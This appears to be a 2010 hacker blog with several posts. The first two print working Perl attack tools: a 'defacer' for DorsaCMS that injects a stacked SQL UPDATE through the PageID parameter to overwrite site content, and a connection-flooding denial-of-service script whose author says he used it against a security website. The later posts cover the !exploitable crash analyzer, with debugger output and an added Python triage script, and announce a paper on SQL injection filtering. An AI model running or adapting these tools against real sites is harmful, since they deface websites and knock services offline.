Thursday, December 16, 2010

DorsaCms SQL Injection Vulnerability

Dorsa is a CMS that has a security certificate.

You can see the security certificate at this link:

But I found a blind SQL injection vulnerability in this CMS.

Exploit code (tested on Windows XP):

system('color a');
system('title DorsaCMS Defacer');
print q{
-= ** =-
DorsaCMS Defacer

[+] Coded by d3c0der   =>

[+] AttackerZ Under Ground Group  =>  wwW.Attackerz.iR
-= ** =-
};

use HTTP::Request;
use LWP::UserAgent;

# Read the target, the page id and the replacement text from the terminal.
print "~# Target : ";
chomp($site = <STDIN>);
print "~# PageID : ";
chomp($id = <STDIN>);
print "~# Deface Text : ";
chomp($def = <STDIN>);

# Normalise the target to an http:// URL with a trailing slash.
if ( $site !~ /^http:/ ) {
    $site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
    $site = $site . '/';
}
print "\n";

print "->hacking : $site\n";

# Stacked query appended to the PageID parameter.
@path1 = ("ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id update news set Comment='$def';--");

foreach $ways (@path1) {
    # Full request URL: target base plus the page path and payload.
    $final = $site . $ways;
    my $req      = HTTP::Request->new(GET => $final);
    my $ua       = LWP::UserAgent->new();
    my $response = $ua->request($req);
}

# ${site} keeps Perl from interpolating a variable named $siteShowPage.
print "[-] now this url is hacked ${site}ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id\n";

# By d3c0der


Thursday, December 2, 2010

simple d.o.s attacker

I wrote a simple Perl denial-of-service script.

I've got it working on Windows XP with ActivePerl.
I used this script to attack the MySQL port of a security website, and here is the result ;)


system('color a');
print q{
-= ** =-
AttackerZ d.o.s Attacker - version 1.0

[+] coded by d3c0der   =>

[+] AttackerZ Under Ground TM  =>  wwW.Attackerz.iR
-= ** =-
};

use IO::Socket;

# Interactive input; command-line arguments, when given, take precedence below.
print "Host: ";
chop($host = <STDIN>);
print "Port: ";
chop($port = <STDIN>);
print "SYN Requests to send : ";
chop($num = <STDIN>);
$host = $ARGV[0] if defined $ARGV[0];
$port = $ARGV[1] if defined $ARGV[1];
$num  = $ARGV[2] if defined $ARGV[2];

# Each iteration opens a complete TCP connection (IO::Socket does a full
# handshake; despite the banner text, no raw SYN packets are crafted).
for ($i = 0; $i < $num; $i++) {
    $sock = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => 'tcp') || die "$! sorry ! Can't Connect";
    syswrite STDOUT, "[+]SYN Request: $i\n";
}
$local_time = localtime();

$login = getlogin();
print " hello $login , your attack finish at $local_time\n";

print "All packets sent to $host\n";

print "Press any key To exit...";
$end = <STDIN>;
chop($end);

Wednesday, November 24, 2010

!exploitable Crash Analyzer

!exploitable (pronounced "bang exploitable") Crash Analyzer is a plugin for the Windows Debugger that parses your crash logs and gives you two important pieces of information. First, it will collate all of your crashes and determine exactly how many there actually are. So for example, out of 60 crash reports, there may only be 2 or 3 actual problems.

0:006> g
(19ec.1a0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=00000113 ecx=00000001 edx=00000000 esi=7c57edd2 edi=007f46bc
eip=41414141 esp=0098fd88 ebp=0098fde0 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
41414141 ??              ???
0:001> !load msec.dll
0:001> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000041414141 called from KERNEL32!BaseThreadStart+0x0000000000000052 (Hash=0x264d5172.0x5a5e1f77)

Access violations at the instruction pointer are exploitable if not near NULL.

The second thing it does is look at the type of crash and try to determine if the error is something that could be exploited by a malicious hacker. This means that more junior employees can work these bug issues without taking the time of more senior examiners. Jason Shirk from the Security Core team joined us to take a look at !exploitable. To download the app, go to:
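The triage described above, scripted as an added example (this is not code from the post or from the !exploitable plugin itself): a log holding several !exploitable runs is parsed for the classification line and the Hash=major.minor pair, and reports are bucketed by major hash so that a pile of crash dumps collapses to its distinct bugs. The sample reports are constructed; apart from the hash shown on this page, the hash values are made up.

```python
import re
from collections import defaultdict

# Constructed sample: three !exploitable reports. The first two share a major
# hash (same bug, different minor hash); the third is a separate, benign crash.
SAMPLE_REPORTS = """
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000041414141 called from KERNEL32!BaseThreadStart+0x0000000000000052 (Hash=0x264d5172.0x5a5e1f77)
---
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000041414141 called from KERNEL32!BaseThreadStart+0x0000000000000052 (Hash=0x264d5172.0x1b2c3d4e)
---
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Recommended Bug Title: Probably Not Exploitable - Read Access Violation on Control Flow starting at module!func+0x0000000000000010 (Hash=0x0a0b0c0d.0x0e0f1011)
"""

CLASS_RE = re.compile(r"^Exploitability Classification:\s*(\S+)", re.M)
HASH_RE = re.compile(r"\(Hash=(0x[0-9a-fA-F]+)\.(0x[0-9a-fA-F]+)\)")

def parse_reports(text):
    """Split a log of several !exploitable runs into (classification, major, minor) tuples."""
    results = []
    for chunk in text.split("---"):  # "---" is this sample's report separator
        cls = CLASS_RE.search(chunk)
        h = HASH_RE.search(chunk)
        if cls and h:
            results.append((cls.group(1), h.group(1).lower(), h.group(2).lower()))
    return results

def bucket_by_major_hash(reports):
    """Collapse many crash reports into distinct bugs keyed on the major (coarse) hash."""
    buckets = defaultdict(lambda: {"count": 0, "classes": set(), "minors": set()})
    for cls, major, minor in reports:
        b = buckets[major]
        b["count"] += 1
        b["classes"].add(cls)
        b["minors"].add(minor)
    return dict(buckets)

def triage(text):
    """Return (number of distinct bugs, sorted major hashes classified EXPLOITABLE)."""
    buckets = bucket_by_major_hash(parse_reports(text))
    exploitable = sorted(h for h, b in buckets.items() if "EXPLOITABLE" in b["classes"])
    return len(buckets), exploitable

if __name__ == "__main__":
    n, exp = triage(SAMPLE_REPORTS)
    print(f"{n} distinct bugs; exploitable major hashes: {exp}")
```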

download video :

Tuesday, August 10, 2010

sql injection filtering

In this article we try to filter SQL injections.
This paper is written in Persian.
You can download it from these links: